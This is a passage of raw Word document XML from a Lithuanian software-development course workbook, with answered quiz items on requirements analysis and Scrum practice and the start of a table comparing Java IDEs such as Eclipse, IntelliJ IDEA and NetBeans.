          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> TRACEABILITY IS NOT CONSIDERED IN REQUIREMENT ANALYSIS</w:t>
      </w:r>
      <w:r w:rsidR="00D062C5">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">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 xml:space="preserve">(2)   False. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="150"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Explanation: Requirements traceability is concerned with documenting the life of a requirement and providing bi-directional traceability between various associated requirements, hence requirements must be traceable.</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3 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>. REQUIREMENTS ANALYSIS IS AN ITERATIVE PROCESS</w:t>
      </w:r>
      <w:r w:rsidR="00D062C5">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">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1)   True</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="150"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Explanation: Requirements analysis is conducted iteratively with functional analysis to optimize performance requirements for identified functions, and to verify that synthesized solutions can satisfy customer requirements.</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 xml:space="preserve">4 užduotis. HOW IS PRODUCT BACKLOG ARRANGED?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4)   Most important items at the top, least important items at the bottom</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5 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. KADA VYKSTANT SPRINTUI GALIMA PRIDĖTI NAUJAS SPRINTO UŽDUOTIS?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4) Kuo greičiau po to kai jos identifikuojamos, jei jos nekeičia darbo apimčių (scope change) siekiant užsibrėžtų sprinto tikslų (sprint goals)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="150"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>. WHAT DO YOU INFER FROM THE FOLLOWING USER STORY? „AS A SALES AGENT, I WANT A CLIENT SEARCH FEATURE SO THAT I CAN FIND MY PREFERRED CLIENTS QUICKLY AND EASILY“</w:t>
      </w:r>
      <w:r w:rsidR="00D062C5">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="150"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">(2) </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Good. Need clarification on “quick and easy” for UI testing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:spacing w:before="480" w:after="160"/>
        <w:ind w:left="357" w:right="113" w:hanging="357"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="982" w:name="_Toc10444034"/>
      <w:bookmarkStart w:id="983" w:name="_Toc13095581"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="984" w:name="_Toc13833475"/>
      <w:r w:rsidR="00D062C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Mokymosi rezultatas. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Naudoti p</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>rojekto eigos valdymo principus</w:t>
      </w:r>
      <w:bookmarkEnd w:id="982"/>
      <w:bookmarkEnd w:id="983"/>
      <w:bookmarkEnd w:id="984"/>
      <w:r w:rsidR="00D062C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</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1 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. WHAT IS A GOOD SIZE FOR A SPRINT TASK?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1) One person per day or less, so other team members can easily detect when a task is stuck</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2 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. HOW OFTEN SHOULD BACKLOG GROOMING OCCUR?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3) Every Sprint</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3 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> WHAT IS A SCRUM TEAM EXPECTED TO DO DURING THE FIRST SPRINT? (galimi keli teisingi atsakymai)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1) Test the product ir (4) Build a thin slice of potentially shippable functionality</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4 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> THE CEO ASKS A TEAM MEMBER TO DO SOME WORK OUTSIDE THE GOALS OF THE CURRENT SPRINT IN PROGRESS. WHAT SHOULD THE TEAM MEMBER DO?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3) Inform the Product Owner so he can work with the CEO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="150"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>5 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> KADA BAIGIAMAS SPRINTO VYKDYMAS? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="150"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">(4) </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Kai baigiasi sprintui skirtas laikas (time-box expires)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="985" w:name="_Toc13095582"/>
      <w:bookmarkStart w:id="986" w:name="_Toc13833476"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Kompetencija. Valdyti savo paties ir komandos atliekamą programinio kodo kūrimą</w:t>
      </w:r>
      <w:bookmarkEnd w:id="985"/>
      <w:bookmarkEnd w:id="986"/>
      <w:r w:rsidR="00240CD4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:spacing w:before="480" w:after="480"/>
        <w:ind w:left="357" w:hanging="357"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="987" w:name="_Toc1899526850"/>
      <w:bookmarkStart w:id="988" w:name="_Toc10444036"/>
      <w:bookmarkStart w:id="989" w:name="_Toc13095583"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="990" w:name="_Toc13833477"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Diegti ir</w:t>
      </w:r>
      <w:r w:rsidR="00240CD4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> valdyti programavimo </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> darbo aplinką.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="987"/>
      <w:bookmarkEnd w:id="988"/>
      <w:bookmarkEnd w:id="989"/>
      <w:bookmarkEnd w:id="990"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:before="480" w:after="160"/>
        <w:ind w:left="357"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>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UŽRAŠYKITE PENKIAS INTEGRUOTAS KŪRIMO APLINKAS (IDE), KURIOS GALI BŪTI NAUDOJAMOS PROGRAMUOJANT JAVA KALBA</w:t>
      </w:r>
      <w:r w:rsidR="00382E69">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 xml:space="preserve">   Programuojant Java kalba galime naudoti: NetBeans, Eclipse, Intellij Idea, BlueJ, jEdit, Eclipse C</w:t>
      </w:r>
      <w:r w:rsidR="00382E69">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>he, DrJava, Geany, Zeus it t.t.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00616C06" w:rsidRPr="003134A6" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="142" w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. UŽPILDYKITE PATEIKTĄ LENTELĘ (JAVA IDE PALYGINIMAS </w:t>
      </w:r>
      <w:r w:rsidR="003134A6">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="003134A6" w:rsidRPr="003134A6">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>pagal</w:t>
      </w:r>
      <w:r w:rsidRPr="003134A6">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 užduotį):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9854" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="709"/>
        <w:gridCol w:w="2019"/>
        <w:gridCol w:w="1571"/>
        <w:gridCol w:w="1564"/>
        <w:gridCol w:w="1458"/>
        <w:gridCol w:w="1164"/>
        <w:gridCol w:w="1369"/>
      </w:tblGrid>
      <w:tr w:rsidR="00616C06" w:rsidRPr="00AD4464" w:rsidTr="009D6E00">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00616C06" w:rsidRPr="00AD4464" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
            <w:pPr>
              <w:spacing w:after="160"/>
              <w:ind w:right="282"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2019" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00616C06" w:rsidRPr="00AD4464" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
            <w:pPr>
              <w:spacing w:after="160"/>
              <w:ind w:right="282"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>IDE (version)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1571" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00616C06" w:rsidRPr="00AD4464" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
            <w:pPr>
              <w:spacing w:after="160"/>
              <w:ind w:right="282"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Syntax highlighting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1564" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00616C06" w:rsidRPr="00AD4464" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
            <w:pPr>
              <w:spacing w:after="160"/>
              <w:ind w:right="282"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Code Completion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1458" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00616C06" w:rsidRPr="00AD4464" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
            <w:pPr>
              <w:spacing w:after="160"/>
              <w:ind w:right="282"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Refactoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1164" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00616C06" w:rsidRPr="00AD4464" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
            <w:pPr>
              <w:spacing w:after="160"/>
              <w:ind w:right="282"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Version control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1369" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00616C06" w:rsidRPr="00AD4464" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
            <w:pPr>
              <w:spacing w:after="160"/>
              <w:ind w:right="282"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Debugging</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00616C06" w:rsidRPr="00AD4464" w:rsidTr="009D6E00">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00616C06" w:rsidRPr="00AD4464" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
            <w:pPr>
              <w:spacing w:after="160"/>
              <w:ind w:right="282"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2019" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00616C06" w:rsidRPr="00AD4464" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
            <w:pPr>
              <w:spacing w:after="160"/>
              <w:ind w:right="282"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Eclipse (4.11)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1571"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5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458"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1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369"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r>
      <w:tr w:rsidR="00616C06" w:rsidRPr="00AD4464" w:rsidTr="009D6E00">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00616C06" w:rsidRPr="00AD4464" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
            <w:pPr>
              <w:spacing w:after="160"/>
              <w:ind w:right="282"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2019" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00616C06" w:rsidRPr="00AD4464" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
            <w:pPr>
              <w:spacing w:after="160"/>
              <w:ind w:right="282"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Intellij Idea (2019.1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1571"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5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458"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1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369"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r>
      <w:tr w:rsidR="00616C06" w:rsidRPr="00AD4464" w:rsidTr="009D6E00">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00616C06" w:rsidRPr="00AD4464" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
            <w:pPr>
              <w:spacing w:after="160"/>
              <w:ind w:right="282"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2019" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00616C06" w:rsidRPr="00AD4464" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
            <w:pPr>
              <w:spacing w:after="160"/>
              <w:ind w:right="282"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>NetBeans (8.2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1571"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5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458"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1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369"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r>
